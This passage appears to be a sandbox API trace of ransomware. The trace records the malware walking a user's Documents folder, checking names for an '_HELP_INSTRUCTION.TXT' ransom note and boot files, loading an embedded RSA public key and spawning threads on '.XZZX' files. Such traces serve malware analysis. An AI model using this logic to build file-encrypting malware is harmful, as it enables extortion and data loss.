LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.061] lstrcpyW (in: lpString1=0x17be7c, lpString2="1B49D0D52A00521DE10DAFA32E183665.XZZX" | out: lpString1="1B49D0D52A00521DE10DAFA32E183665.XZZX") returned="1B49D0D52A00521DE10DAFA32E183665.XZZX" [0105.061] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x388 [0105.061] Sleep (dwMilliseconds=0x96) [0105.212] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0105.212] lstrcmpW (lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpString2="..") returned 1 [0105.212] lstrcmpW (lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpString2=".") returned 1 [0105.212] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0105.212] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="ntldr") returned 0x0 [0105.212] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="NTLDR") returned 0x0 [0105.212] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0105.212] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="ntdetect.com") returned 0x0 [0105.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0105.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0105.212] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0105.212] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.212] lstrcpyW (in: lpString1=0x17be7c, lpString2="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" | out: lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" [0105.213] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0105.213] Sleep (dwMilliseconds=0x96) [0105.370] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0105.370] lstrcmpW (lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpString2="..") returned 1 [0105.370] lstrcmpW (lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpString2=".") returned 1 [0105.370] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0105.370] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="ntldr") returned 0x0 [0105.370] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="NTLDR") returned 0x0 [0105.370] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0105.370] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0105.370] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0105.370] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0105.370] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0105.370] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.370] lstrcpyW (in: lpString1=0x17be7c, lpString2="2525214410F7DA278BE33B7C150FBE6F.XZZX" | out: lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX") returned="2525214410F7DA278BE33B7C150FBE6F.XZZX" [0105.370] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.370] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x390 [0105.370] WaitForSingleObject (hHandle=0x390, dwMilliseconds=0xffffffff) returned 0x0 [0105.371] Sleep (dwMilliseconds=0x96) [0105.524] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0105.524] lstrcmpW (lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX", lpString2="..") returned 1 [0105.524] lstrcmpW (lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX", lpString2=".") returned 1 [0105.524] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0105.524] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="ntldr") returned 0x0 [0105.524] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="NTLDR") returned 0x0 [0105.524] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0105.524] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0105.524] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0105.524] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0105.524] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0105.524] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.524] lstrcpyW (in: lpString1=0x17be7c, lpString2="3D3271B13FFA5012E003EAB54427345A.XZZX" | out: lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX") returned="3D3271B13FFA5012E003EAB54427345A.XZZX" [0105.524] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.524] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x394 [0105.525] Sleep (dwMilliseconds=0x96) [0105.680] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0105.680] lstrcmpW (lpString1="4718805A3B556C301085A1313FC25078.XZZX", lpString2="..") returned 1 [0105.680] lstrcmpW (lpString1="4718805A3B556C301085A1313FC25078.XZZX", lpString2=".") returned 1 [0105.680] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0105.680] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="ntldr") returned 0x0 [0105.680] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="NTLDR") returned 0x0 [0105.680] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0105.680] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="ntdetect.com") returned 0x0 [0105.680] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0105.680] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0105.680] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0105.680] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.680] lstrcpyW (in: lpString1=0x17be7c, lpString2="4718805A3B556C301085A1313FC25078.XZZX" | out: lpString1="4718805A3B556C301085A1313FC25078.XZZX") returned="4718805A3B556C301085A1313FC25078.XZZX" [0105.680] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.680] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x398 [0105.681] Sleep (dwMilliseconds=0x96) [0105.836] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0105.836] lstrcmpW (lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpString2="..") returned 1 [0105.836] lstrcmpW (lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpString2=".") returned 1 [0105.836] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0105.836] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="ntldr") returned 0x0 [0105.836] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="NTLDR") returned 0x0 [0105.836] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0105.836] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0105.836] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0105.836] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0105.836] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0105.836] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.836] lstrcpyW (in: lpString1=0x17be7c, lpString2="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" | out: lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" [0105.836] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.836] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x39c [0105.836] Sleep (dwMilliseconds=0x96) [0105.992] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0105.992] lstrcmpW (lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpString2="..") returned 1 [0105.992] lstrcmpW (lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpString2=".") returned 1 [0105.992] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0105.992] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="ntldr") returned 0x0 [0105.992] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="NTLDR") returned 0x0 [0105.992] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0105.992] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="ntdetect.com") returned 0x0 [0105.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0105.992] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0105.992] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0105.992] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.992] lstrcpyW (in: lpString1=0x17be7c, lpString2="A0DC431228DE1E088FD30DB72CF60250.XZZX" | out: lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX") returned="A0DC431228DE1E088FD30DB72CF60250.XZZX" [0105.992] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.992] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3a0 [0105.992] Sleep (dwMilliseconds=0x96) [0106.148] FindNextFileW (in: hFindFile=0x3a5590, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0106.148] lstrcmpW (lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpString2="..") returned 1 [0106.148] lstrcmpW (lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpString2=".") returned 1 [0106.148] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0106.148] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="ntldr") returned 0x0 [0106.148] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="NTLDR") returned 0x0 [0106.148] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0106.148] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="ntdetect.com") returned 0x0 [0106.148] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="Desktop") returned 0x0 [0106.148] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\", lpSrch="DESKTOP") returned 0x0 [0106.148] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned 65 [0106.148] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0106.148] lstrcpyW (in: lpString1=0x17be7c, lpString2="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" | out: lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" [0106.148] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS 